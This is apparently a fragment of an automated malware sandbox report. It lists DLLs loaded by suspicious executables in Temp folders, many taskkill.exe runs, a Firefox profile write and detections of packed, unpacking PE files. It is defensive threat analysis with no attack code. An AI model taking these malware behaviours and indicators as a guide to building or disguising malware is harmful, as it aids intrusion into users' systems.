Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 1937408 > 1048576
Source: file.exe Static PE information: Raw size of lfxcpyub is bigger than: 0x100000 < 0x1a7200
Source: Binary string: "description": "The name of the library's debug file. For example, 'xul.pdb" source: firefox.exe, 00000027.00000002.3085467799.000001EF2EA3F000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.fd0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lfxcpyub:EW;hhzixuje:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lfxcpyub:EW;hhzixuje:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 2.2.axplong.exe.9d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lfxcpyub:EW;hhzixuje:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lfxcpyub:EW;hhzixuje:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 3.2.axplong.exe.9d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lfxcpyub:EW;hhzixuje:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lfxcpyub:EW;hhzixuje:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 6.2.axplong.exe.9d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lfxcpyub:EW;hhzixuje:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lfxcpyub:EW;hhzixuje:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Unpacked PE file: 7.2.63371c25d6.exe.6c0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mmgyxokd:EW;ujjtsjxw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mmgyxokd:EW;ujjtsjxw:EW;.taggant:EW;
